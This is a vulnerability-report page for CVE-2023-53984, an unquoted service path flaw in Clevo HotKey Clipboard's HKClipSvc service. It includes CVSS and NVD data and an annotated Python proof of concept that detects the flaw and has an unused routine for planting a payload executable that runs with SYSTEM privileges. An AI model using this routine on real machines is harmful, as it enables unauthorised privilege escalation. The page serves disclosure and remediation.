Security Vulnerability Report
CVE-2023-53984 CVSS 8.4 HIGH

CVE-2023-53984

Published: 2026-01-13 23:15:59
Last Modified: 2026-04-15 00:35:42

Description

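Clevo HotKey Clipboard 2.1.0.6 contains an unquoted service path vulnerability in the HKClipSvc service that allows local non-privileged users to potentially execute code with system privileges. Attackers can exploit the misconfigured service path to inject and execute arbitrary code by placing malicious executables in specific file system locations. This is the CWE-428 pattern: because the service's binary path contains spaces and is not enclosed in quotation marks, Windows can resolve it to an executable at a shorter, space-delimited prefix of the path. It is only reachable by a user who can write to one of the directories along that path, so remediation is to quote the service's binary path and to confirm that those directories are not writable by non-privileged users.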

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Clevo HotKey Clipboard <= 2.1.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2023-53984 PoC - Clevo HotKey Clipboard HKClipSvc Unquoted Service Path
# Author: Security Researcher
# Date: 2023
#
# NOTE(review): this listing was published with its line breaks and indentation
# collapsed; the block structure below is reconstructed from the syntax, so the
# exact nesting of the return/else branches should be confirmed against the
# original exploit-db entry referenced on this page.
#
# NOTE(review): the check only inspects how the service path is written. It does
# not look at directory permissions, and the CWE-428 condition matters only where
# a non-privileged user can write to a directory along the service path. For
# triage, pair a positive result with an ACL review of those directories; the
# durable fix is to quote the service's binary path.

import os
import sys
import ctypes  # not referenced anywhere in this listing
import subprocess
from pathlib import Path  # not referenced anywhere in this listing


def check_vulnerability():
    """
    Report whether the HKClipSvc service is configured with an unquoted path.

    Runs ``sc qc HKClipSvc``, takes the text after the first ':' on the
    BINARY_PATH_NAME line, and flags it when it contains a space and does
    not start with a double quote.

    Returns:
        ``(True, paths)`` when the path is flagged, where ``paths`` is the
        list of strings built below; ``(False, [])`` when the path is not
        flagged or any exception is raised. If the ``sc`` output has no
        BINARY_PATH_NAME line the function falls off the end and returns
        ``None``, which the tuple unpacking in ``main`` does not handle.
    """
    try:
        # Query HKClipSvc service configuration
        result = subprocess.run(
            ['sc', 'qc', 'HKClipSvc'],
            capture_output=True,
            text=True,
            creationflags=subprocess.CREATE_NO_WINDOW if hasattr(subprocess, 'CREATE_NO_WINDOW') else 0
        )

        if 'BINARY_PATH_NAME' in result.stdout:
            print("[+] HKClipSvc service found")

            # Extract binary path
            for line in result.stdout.split('\n'):
                if 'BINARY_PATH_NAME' in line:
                    path = line.split(':', 1)[1].strip()
                    print(f"[+] Binary path: {path}")

                    # Check if path is unquoted and contains spaces
                    # NOTE(review): any space matches, including one that only
                    # separates the executable from its arguments, so a positive
                    # result needs manual confirmation.
                    if ' ' in path and not path.startswith('"'):
                        print("[!] VULNERABLE: Unquoted service path detected!")

                        # Build the list that is printed and returned to main.
                        # NOTE(review): the fragments are rejoined with a
                        # backslash instead of the original space, so the
                        # entries are not prefixes of the configured path
                        # string. Do not treat this list as an audit result.
                        path_parts = path.split(' ')
                        exploitable_paths = []
                        current_path = path_parts[0]
                        for i, part in enumerate(path_parts[1:]):  # i is unused
                            current_path += '\\' + part
                            exe_path = current_path + '.exe'
                            exploitable_paths.append(exe_path)

                        print(f"[!] Exploitable paths:")
                        for p in exploitable_paths:
                            print(f" - {p}")

                        return True, exploitable_paths
                    else:
                        # This branch is also taken for an unquoted path with no
                        # spaces, although the message says "properly quoted".
                        print("[-] NOT VULNERABLE: Path is properly quoted")
                        return False, []
    except Exception as e:
        # Any failure, including a missing `sc` binary, is reported as
        # "not vulnerable"; an error here is not evidence of a safe config.
        print(f"[-] Error: {e}")
        return False, []


def exploit_vulnerability(exe_path, payload_path):
    """
    Copy an existing file to a path returned by ``check_vulnerability``.

    Not called anywhere in this listing; the only call site in ``main`` is
    commented out.

    Args:
        exe_path: Destination path for the copied file
        payload_path: Source file to copy

    Returns:
        True when the copy was made; False when the destination directory
        fails the ``os.access`` write check, the source file does not exist,
        or an exception is raised.
    """
    try:
        # Check if we have write permissions to the target path
        # NOTE(review): the failure message below is the practical limit of this
        # issue. Without write access to the parent directory nothing happens,
        # which is why directory ACLs are the thing to audit.
        target_dir = os.path.dirname(exe_path)
        if not os.access(target_dir, os.W_OK):
            print(f"[-] No write permission to {target_dir}")
            print("[-] This exploit requires administrative privileges or specific file permissions")
            return False

        # Copy payload to exploitable path
        # Detection note: an unexpected new .exe in a parent directory of a
        # service binary is the artifact this step leaves behind.
        if os.path.exists(payload_path):
            print(f"[+] Copying payload to {exe_path}")
            import shutil
            shutil.copy2(payload_path, exe_path)
            print(f"[+] Payload deployed successfully")
            print(f"[!] When HKClipSvc restarts, the payload will execute with SYSTEM privileges")
            return True
        else:
            print(f"[-] Payload not found: {payload_path}")
            return False

    except PermissionError:
        print("[-] Permission denied - requires elevated privileges")
        return False
    except Exception as e:
        print(f"[-] Exploit failed: {e}")
        return False


def main():
    """
    Print a banner, run the service-path check on Windows, and report the result.

    Exits with status 1 on any platform other than win32. Only performs the
    read-only check; it never calls ``exploit_vulnerability``.
    """
    print("=" * 60)
    print("CVE-2023-53984 - Clevo HotKey Clipboard Exploitation Tool")
    print("=" * 60)

    # Check if running on Windows
    if sys.platform != 'win32':
        print("[-] This exploit only works on Windows systems")
        sys.exit(1)

    print("\n[+] Checking for vulnerability...")
    # NOTE(review): raises TypeError if check_vulnerability() returns None
    # (service not installed / no BINARY_PATH_NAME line in the output).
    is_vulnerable, exploitable_paths = check_vulnerability()

    if is_vulnerable:
        print("\n[!] System is VULNERABLE to CVE-2023-53984")
        print("\n[!] To exploit, place a malicious executable at one of the paths above")
        print("[!] Then restart the HKClipSvc service or wait for system reboot")

        # Example exploitation (commented out for safety)
        # payload = "C:\\temp\\malicious.exe"
        # for path in exploitable_paths:
        #     exploit_vulnerability(path, payload)
    else:
        print("\n[-] System does not appear to be vulnerable")


if __name__ == '__main__':
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53984", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:59.430", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Clevo HotKey Clipboard 2.1.0.6 contains an unquoted service path vulnerability in the HKClipSvc service that allows local non-privileged users to potentially execute code with system privileges. Attackers can exploit the misconfigured service path to inject and execute arbitrary code by placing malicious executables in specific file system locations."}, {"lang": "es", "value": "Clevo HotKey Clipboard 2.1.0.6 contiene una vulnerabilidad de ruta de servicio sin comillas en el servicio HKClipSvc que permite a usuarios locales no privilegiados ejecutar código potencialmente con privilegios de sistema. Los atacantes pueden explotar la ruta de servicio mal configurada para inyectar y ejecutar código arbitrario colocando ejecutables maliciosos en ubicaciones específicas del sistema de archivos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", 
"modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://web.archive.org/web/20200713203236/https://www.clevo.com.tw/index-en.asp", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51206", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/hotkey-clipboard-privilege-escalation-unquoted-service-path", "source": "[email protected]"}]}}